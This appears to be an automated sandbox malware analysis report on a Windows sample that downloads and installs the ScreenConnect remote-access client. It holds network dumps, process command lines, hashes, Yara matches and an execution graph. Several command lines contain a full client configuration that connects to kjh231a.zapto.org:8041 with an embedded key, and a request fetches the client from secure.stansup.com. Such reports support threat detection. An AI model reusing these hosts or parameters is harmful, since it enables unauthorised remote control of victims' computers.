                                                                                                                                                                                                                                                        2024-10-25 17:27:49 UTC16384INData Raw: 02 7b 23 05 00 0a 28 31 0a 00 0a 2a 1e 02 28 3c 00 00 0a 2a 4a 02 7b 27 05 00 0a 02 7b 28 05 00 0a 28 31 0a 00 0a 2a 2e 73 04 10 00 06 80 23 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 1e 03 6f 1b 07 00 06 2a 1e 03 6f 43 00 00 0a 2a 2e 73 08 10 00 06 80 26 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 1e 03 6f 43 00 00 0a 2a 2e 73 0b 10 00 06 80 28 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 22 0f 01 28 4b 0b 00 06 2a 3a 0f 01 fe 16 4b 01 00 02 6f 43 00 00 0a 2a 2e 73 0f 10 00 06 80 2b 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 3a 0f 01 fe 16 c1 00 00 02 6f 43 00 00 0a 2a 1e 02 28 3c 00 00 0a 2a 2e 73 13 10 00 06 80 32 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 36 03 03 28 1a 02 00 2b 73 32 0a 00 0a 2a 2a 03 6f 33 0a 00 0a 14 fe 03 2a 5e 03 03 6f 34 0a 00 0a 28 bc 01 00 2b 28 f8 0b 00 06 73 35
                                                                                                                                                                                                                                                        Data Ascii: {#(1*(<*J{'{((1*.s#*(<*o*oC*.s&*(<*oC*.s(*(<*"(K*:KoC*.s+*(<*:oC*(<*.s2*(<*6(+s2**o3*^o4(+(s5
                                                                                                                                                                                                                                                        2024-10-25 17:27:49 UTC16384INData Raw: 27 3d 01 00 6d 00 9a 01 fe 02 09 01 10 00 e6 4f 01 00 27 3d 01 00 6d 00 9e 01 06 03 09 01 10 00 d9 bb 00 00 27 3d 01 00 6d 00 a0 01 14 03 09 01 10 00 96 3a 01 00 27 3d 01 00 6d 00 a2 01 1f 03 09 01 10 00 9c ff 00 00 27 3d 01 00 6d 00 a6 01 46 03 81 01 10 00 cc 3a 01 00 27 3d 01 00 35 00 a9 01 5a 03 01 20 10 00 0e e3 00 00 27 3d 01 00 35 00 ab 01 63 03 01 20 10 00 4d 34 01 00 27 3d 01 00 35 00 ae 01 7b 03 01 00 10 00 e9 7f 00 00 27 3d 01 00 35 00 b1 01 80 03 81 00 10 00 cf fc 00 00 27 3d 01 00 3c 03 b2 01 8a 03 01 00 10 00 8d fe 00 00 27 3d 01 00 24 03 b4 01 95 03 01 00 10 00 96 fd 00 00 27 3d 01 00 24 03 b6 01 99 03 01 00 10 00 fa 7f 00 00 27 3d 01 00 35 00 b6 01 9d 03 01 00 10 00 56 91 00 00 27 3d 01 00 35 00 b7 01 a7 03 01 00 10 00 47 91 00 00 27 3d 01
                                                                                                                                                                                                                                                        Data Ascii: '=mO'=m'=m:'=m'=mF:'=5Z '=5c M4'=5{'=5'=<'=$'=$'=5V'=5G'=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.11 | 49910 | 79.110.49.185 | 443 | 7652 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-25 17:27:51 UTC | 102 | OUT | GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1
Host: secure.stansup.com
Accept-Encoding: gzip
2024-10-25 17:27:52 UTC | 216 | IN | HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 600864
Content-Type: text/html
Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
Date: Fri, 25 Oct 2024 17:27:51 GMT
Connection: close


Target ID: 0
Start time: 13:27:17
Start date: 25/10/2024
Path: C:\Users\user\Desktop\96r3GgxntQ.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\96r3GgxntQ.exe"
Imagebase: 0xbb0000
File size: 83'360 bytes
MD5 hash: 1D59C17159AD086256E0C1C2C34666AE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 2
                                                                                                                                                                                                                                                        Start time:13:27:17
                                                                                                                                                                                                                                                        Start date:25/10/2024
                                                                                                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                                                                                                                                                                                                                                                        Imagebase:0x27688430000
                                                                                                                                                                                                                                                        File size:24'856 bytes
                                                                                                                                                                                                                                                        MD5 hash:B4088F44B80D363902E11F897A7BAC09
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000002.00000002.2257457439.00000276A42F9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000002.00000002.2237912718.000002768A2CB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                                                                                        Start time:13:27:18
                                                                                                                                                                                                                                                        Start date:25/10/2024
                                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                                                                        Imagebase:0x7ff68dea0000
                                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                                                                                        Start time:13:27:18
                                                                                                                                                                                                                                                        Start date:25/10/2024
                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 7608 -ip 7608
                                                                                                                                                                                                                                                        Imagebase:0xa40000
                                                                                                                                                                                                                                                        File size:483'680 bytes
                                                                                                                                                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                                                                        Start time:13:27:18
                                                                                                                                                                                                                                                        Start date:25/10/2024
                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7608 -s 864
                                                                                                                                                                                                                                                        Imagebase:0xa40000
                                                                                                                                                                                                                                                        File size:483'680 bytes
                                                                                                                                                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                                                                                        Start time:13:27:18
                                                                                                                                                                                                                                                        Start date:25/10/2024
                                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                        Imagebase:0x7ff68dea0000
                                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                                                                                        Start time:13:27:20
                                                                                                                                                                                                                                                        Start date:25/10/2024
                                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                                                                                        Imagebase:0x7ff68dea0000
                                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                                                                        Start time:13:27:54
                                                                                                                                                                                                                                                        Start date:25/10/2024
                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe"
                                                                                                                                                                                                                                                        Imagebase:0xa0000
                                                                                                                                                                                                                                                        File size:600'864 bytes
                                                                                                                                                                                                                                                        MD5 hash:D95CC7E6F8EC5DDE28E1EFFA58E7AC8D
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000A.00000000.1725313898.00000000000A2000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000A.00000002.1736710377.000000000242F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                                                                                        Start time:13:27:54
                                                                                                                                                                                                                                                        Start date:25/10/2024
                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%2520Session" "1"
                                                                                                                                                                                                                                                        Imagebase:0x8a0000
                                                                                                                                                                                                                                                        File size:95'520 bytes
                                                                                                                                                                                                                                                        MD5 hash:200A917996F0FC74879076354454473A
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                                                                        Start time:13:27:54
                                                                                                                                                                                                                                                        Start date:25/10/2024
                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%2520Session" "1"
                                                                                                                                                                                                                                                        Imagebase:0x8a0000
                                                                                                                                                                                                                                                        File size:95'520 bytes
                                                                                                                                                                                                                                                        MD5 hash:200A917996F0FC74879076354454473A
                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                                                                                        Start time:13:27:56
                                                                                                                                                                                                                                                        Start date:25/10/2024
                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" "RunRole" "4e12b011-b423-4052-ba92-2560e19f3148" "User"
                                                                                                                                                                                                                                                        Imagebase:0xc70000
                                                                                                                                                                                                                                                        File size:600'864 bytes
                                                                                                                                                                                                                                                        MD5 hash:D95CC7E6F8EC5DDE28E1EFFA58E7AC8D
                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                          Execution Coverage:2.2%
                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                          Signature Coverage:3.8%
                                                                                                                                                                                                                                                          Total number of Nodes:1465
                                                                                                                                                                                                                                                          Total number of Limit Nodes:4
6696->6697 6698 bb17d3 6696->6698 6705 bb3cf1 6697->6705 6702 bb3c81 6698->6702 6701 bb17d8 6701->6659 6703 bb3cf1 24 API calls 6702->6703 6704 bb3c93 6703->6704 6704->6701 6708 bb39f8 6705->6708 6711 bb392e 6708->6711 6710 bb3a1c 6710->6701 6712 bb393a ___scrt_is_nonwritable_in_current_image 6711->6712 6719 bb56e2 EnterCriticalSection 6712->6719 6714 bb3948 6720 bb3b40 6714->6720 6716 bb3955 6730 bb3973 6716->6730 6718 bb3966 _abort 6718->6710 6719->6714 6721 bb3b56 __dosmaperr 6720->6721 6722 bb3b5e 6720->6722 6721->6716 6722->6721 6723 bb3bb7 6722->6723 6725 bb681b 24 API calls 6722->6725 6723->6721 6724 bb681b 24 API calls 6723->6724 6727 bb3bcd 6724->6727 6726 bb3bad 6725->6726 6728 bb4869 _free 15 API calls 6726->6728 6729 bb4869 _free 15 API calls 6727->6729 6728->6723 6729->6721 6733 bb572a LeaveCriticalSection 6730->6733 6732 bb397d 6732->6718 6733->6732 6735 bb3e48 6734->6735 6739 bb3e68 6734->6739 6736 bb47f9 _free 15 API calls 6735->6736 6737 bb3e5e 6736->6737 6738 bb473d _abort 21 API calls 6737->6738 6738->6739 6739->6685 5932 bb3d8f 5933 bb3d9e 5932->5933 5937 bb3db2 5932->5937 5935 bb4869 _free 15 API calls 5933->5935 5933->5937 5934 bb4869 _free 15 API calls 5936 bb3dc4 5934->5936 5935->5937 5938 bb4869 _free 15 API calls 5936->5938 5937->5934 5939 bb3dd7 5938->5939 5940 bb4869 _free 15 API calls 5939->5940 5941 bb3de8 5940->5941 5942 bb4869 _free 15 API calls 5941->5942 5943 bb3df9 5942->5943 6516 bb430f 6517 bb431a 6516->6517 6521 bb432a 6516->6521 6522 bb4330 6517->6522 6520 bb4869 _free 15 API calls 6520->6521 6523 bb4349 6522->6523 6524 bb4343 6522->6524 6526 bb4869 _free 15 API calls 6523->6526 6525 bb4869 _free 15 API calls 6524->6525 6525->6523 6527 bb4355 6526->6527 6528 bb4869 _free 15 API calls 6527->6528 6529 bb4360 6528->6529 6530 bb4869 _free 15 API calls 6529->6530 6531 bb436b 6530->6531 6532 bb4869 _free 15 API calls 6531->6532 6533 bb4376 6532->6533 6534 bb4869 _free 15 API calls 6533->6534 6535 bb4381 6534->6535 6536 bb4869 _free 
15 API calls 6535->6536 6537 bb438c 6536->6537 6538 bb4869 _free 15 API calls 6537->6538 6539 bb4397 6538->6539 6540 bb4869 _free 15 API calls 6539->6540 6541 bb43a2 6540->6541 6542 bb4869 _free 15 API calls 6541->6542 6543 bb43b0 6542->6543 6548 bb41f6 6543->6548 6554 bb4102 6548->6554 6550 bb421a 6551 bb4246 6550->6551 6567 bb4163 6551->6567 6553 bb426a 6553->6520 6555 bb410e ___scrt_is_nonwritable_in_current_image 6554->6555 6562 bb56e2 EnterCriticalSection 6555->6562 6557 bb4142 6563 bb4157 6557->6563 6559 bb4118 6559->6557 6561 bb4869 _free 15 API calls 6559->6561 6560 bb414f _abort 6560->6550 6561->6557 6562->6559 6566 bb572a LeaveCriticalSection 6563->6566 6565 bb4161 6565->6560 6566->6565 6568 bb416f ___scrt_is_nonwritable_in_current_image 6567->6568 6575 bb56e2 EnterCriticalSection 6568->6575 6570 bb4179 6571 bb43d9 __dosmaperr 15 API calls 6570->6571 6572 bb418c 6571->6572 6576 bb41a2 6572->6576 6574 bb419a _abort 6574->6553 6575->6570 6579 bb572a LeaveCriticalSection 6576->6579 6578 bb41ac 6578->6574 6579->6578 6108 bb55ce GetCommandLineA GetCommandLineW 5032 bb130d 5033 bb1319 ___scrt_is_nonwritable_in_current_image 5032->5033 5060 bb162b 5033->5060 5035 bb1320 5036 bb1473 5035->5036 5048 bb134a ___scrt_is_nonwritable_in_current_image _abort ___scrt_release_startup_lock 5035->5048 5112 bb191f IsProcessorFeaturePresent 5036->5112 5038 bb147a 5039 bb1480 5038->5039 5116 bb37e1 5038->5116 5119 bb3793 5039->5119 5043 bb1369 5044 bb13ea 5068 bb1a34 5044->5068 5048->5043 5048->5044 5097 bb37a9 5048->5097 5052 bb1405 5103 bb1a6a GetModuleHandleW 5052->5103 5055 bb1410 5056 bb1419 5055->5056 5105 bb3784 5055->5105 5108 bb179c 5056->5108 5061 bb1634 5060->5061 5122 bb1bd4 IsProcessorFeaturePresent 5061->5122 5065 bb1645 5066 bb1649 5065->5066 5132 bb1f7d 5065->5132 5066->5035 5192 bb20b0 5068->5192 5071 bb13f0 5072 bb3457 5071->5072 5194 bb522b 5072->5194 5074 bb13f8 5077 bb1000 6 API calls 5074->5077 5076 bb3460 5076->5074 5198 bb55b6 5076->5198 5078 bb11e3 
Sleep 5077->5078 5079 bb1096 CryptMsgGetParam 5077->5079 5080 bb11f7 5078->5080 5081 bb1215 CertCloseStore LocalFree LocalFree LocalFree 5078->5081 5082 bb10bc LocalAlloc 5079->5082 5083 bb1162 CryptMsgGetParam 5079->5083 5080->5081 5087 bb120a CertDeleteCertificateFromStore 5080->5087 5081->5052 5084 bb10d7 5082->5084 5085 bb1156 LocalFree 5082->5085 5083->5078 5086 bb1174 CryptMsgGetParam 5083->5086 5088 bb10e0 LocalAlloc CryptMsgGetParam 5084->5088 5085->5083 5086->5078 5089 bb1188 CertFindAttribute CertFindAttribute 5086->5089 5087->5080 5090 bb113d LocalFree 5088->5090 5091 bb1114 CertCreateCertificateContext 5088->5091 5092 bb11b1 5089->5092 5093 bb11b5 LoadLibraryA GetProcAddress 5089->5093 5090->5088 5096 bb114d 5090->5096 5094 bb1133 CertFreeCertificateContext 5091->5094 5095 bb1126 CertAddCertificateContextToStore 5091->5095 5092->5078 5092->5093 5093->5078 5094->5090 5095->5094 5096->5085 5098 bb37d1 __dosmaperr _abort 5097->5098 5098->5044 5099 bb4424 _abort 33 API calls 5098->5099 5102 bb3e9a 5099->5102 5100 bb3f24 _abort 33 API calls 5101 bb3ec4 5100->5101 5102->5100 5104 bb140c 5103->5104 5104->5038 5104->5055 5686 bb355e 5105->5686 5107 bb378f 5107->5056 5110 bb17a8 ___scrt_uninitialize_crt 5108->5110 5109 bb1421 5109->5043 5110->5109 5111 bb1f7d ___scrt_uninitialize_crt 7 API calls 5110->5111 5111->5109 5113 bb1935 _abort 5112->5113 5114 bb19e0 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5113->5114 5115 bb1a24 _abort 5114->5115 5115->5038 5117 bb355e _abort 23 API calls 5116->5117 5118 bb37f2 5117->5118 5118->5039 5120 bb355e _abort 23 API calls 5119->5120 5121 bb1488 5120->5121 5123 bb1640 5122->5123 5124 bb1f5e 5123->5124 5138 bb24b1 5124->5138 5128 bb1f6f 5129 bb1f7a 5128->5129 5152 bb24ed 5128->5152 5129->5065 5131 bb1f67 5131->5065 5133 bb1f90 5132->5133 5134 bb1f86 5132->5134 5133->5066 5135 bb2496 ___vcrt_uninitialize_ptd 6 API calls 5134->5135 5136 bb1f8b 5135->5136 5137 bb24ed ___vcrt_uninitialize_locks 
DeleteCriticalSection 5136->5137 5137->5133 5140 bb24ba 5138->5140 5141 bb24e3 5140->5141 5142 bb1f63 5140->5142 5156 bb271d 5140->5156 5143 bb24ed ___vcrt_uninitialize_locks DeleteCriticalSection 5141->5143 5142->5131 5144 bb2463 5142->5144 5143->5142 5173 bb262e 5144->5173 5149 bb2493 5149->5128 5151 bb2478 5151->5128 5153 bb2517 5152->5153 5154 bb24f8 5152->5154 5153->5131 5155 bb2502 DeleteCriticalSection 5154->5155 5155->5153 5155->5155 5161 bb2543 5156->5161 5159 bb2755 InitializeCriticalSectionAndSpinCount 5160 bb2740 5159->5160 5160->5140 5162 bb2560 5161->5162 5163 bb2564 5161->5163 5162->5159 5162->5160 5163->5162 5164 bb25cc GetProcAddress 5163->5164 5166 bb25bd 5163->5166 5168 bb25e3 LoadLibraryExW 5163->5168 5164->5162 5166->5164 5167 bb25c5 FreeLibrary 5166->5167 5167->5164 5169 bb25fa GetLastError 5168->5169 5170 bb262a 5168->5170 5169->5170 5171 bb2605 ___vcrt_InitializeCriticalSectionEx 5169->5171 5170->5163 5171->5170 5172 bb261b LoadLibraryExW 5171->5172 5172->5163 5174 bb2543 ___vcrt_InitializeCriticalSectionEx 5 API calls 5173->5174 5175 bb2648 5174->5175 5176 bb2661 TlsAlloc 5175->5176 5177 bb246d 5175->5177 5177->5151 5178 bb26df 5177->5178 5179 bb2543 ___vcrt_InitializeCriticalSectionEx 5 API calls 5178->5179 5180 bb26f9 5179->5180 5181 bb2714 TlsSetValue 5180->5181 5182 bb2486 5180->5182 5181->5182 5182->5149 5183 bb2496 5182->5183 5184 bb24a6 5183->5184 5185 bb24a0 5183->5185 5184->5151 5187 bb2669 5185->5187 5188 bb2543 ___vcrt_InitializeCriticalSectionEx 5 API calls 5187->5188 5189 bb2683 5188->5189 5190 bb269b TlsFree 5189->5190 5191 bb268f 5189->5191 5190->5191 5191->5184 5193 bb1a47 GetStartupInfoW 5192->5193 5193->5071 5195 bb523d 5194->5195 5196 bb5234 5194->5196 5195->5076 5201 bb512a 5196->5201 5683 bb555d 5198->5683 5221 bb4424 GetLastError 5201->5221 5203 bb5137 5241 bb5249 5203->5241 5205 bb513f 5250 bb4ebe 5205->5250 5208 bb5156 5208->5195 5211 bb5199 5275 bb4869 5211->5275 5214 bb518c 5215 bb5194 5214->5215 5218 bb51b1 
5214->5218 5272 bb47f9 5215->5272 5217 bb51dd 5217->5211 5281 bb4d94 5217->5281 5218->5217 5219 bb4869 _free 15 API calls 5218->5219 5219->5217 5222 bb443a 5221->5222 5223 bb4440 5221->5223 5284 bb5904 5222->5284 5227 bb448f SetLastError 5223->5227 5289 bb480c 5223->5289 5227->5203 5228 bb445a 5230 bb4869 _free 15 API calls 5228->5230 5233 bb4460 5230->5233 5231 bb446f 5231->5228 5232 bb4476 5231->5232 5301 bb4296 5232->5301 5235 bb449b SetLastError 5233->5235 5306 bb3f24 5235->5306 5238 bb4869 _free 15 API calls 5240 bb4488 5238->5240 5240->5227 5240->5235 5242 bb5255 ___scrt_is_nonwritable_in_current_image 5241->5242 5243 bb4424 _abort 33 API calls 5242->5243 5248 bb525f 5243->5248 5245 bb52e3 _abort 5245->5205 5247 bb3f24 _abort 33 API calls 5247->5248 5248->5245 5248->5247 5249 bb4869 _free 15 API calls 5248->5249 5542 bb56e2 EnterCriticalSection 5248->5542 5543 bb52da 5248->5543 5249->5248 5547 bb3f72 5250->5547 5253 bb4edf GetOEMCP 5256 bb4f08 5253->5256 5254 bb4ef1 5255 bb4ef6 GetACP 5254->5255 5254->5256 5255->5256 5256->5208 5257 bb62ff 5256->5257 5258 bb633d 5257->5258 5262 bb630d __dosmaperr 5257->5262 5259 bb47f9 _free 15 API calls 5258->5259 5261 bb5167 5259->5261 5260 bb6328 HeapAlloc 5260->5261 5260->5262 5261->5211 5264 bb52eb 5261->5264 5262->5258 5262->5260 5263 bb6992 __dosmaperr 2 API calls 5262->5263 5263->5262 5265 bb4ebe 35 API calls 5264->5265 5266 bb530a 5265->5266 5267 bb535b IsValidCodePage 5266->5267 5269 bb5311 _ValidateLocalCookies 5266->5269 5271 bb5380 _abort 5266->5271 5268 bb536d GetCPInfo 5267->5268 5267->5269 5268->5269 5268->5271 5269->5214 5584 bb4f96 GetCPInfo 5271->5584 5273 bb44a8 __dosmaperr 15 API calls 5272->5273 5274 bb47fe 5273->5274 5274->5211 5276 bb4874 HeapFree 5275->5276 5280 bb489d _free 5275->5280 5277 bb4889 5276->5277 5276->5280 5278 bb47f9 _free 13 API calls 5277->5278 5279 bb488f GetLastError 5278->5279 5279->5280 5280->5208 5647 bb4d51 5281->5647 5283 bb4db8 5283->5211 5317 bb5741 5284->5317 5286 bb592b 5287 
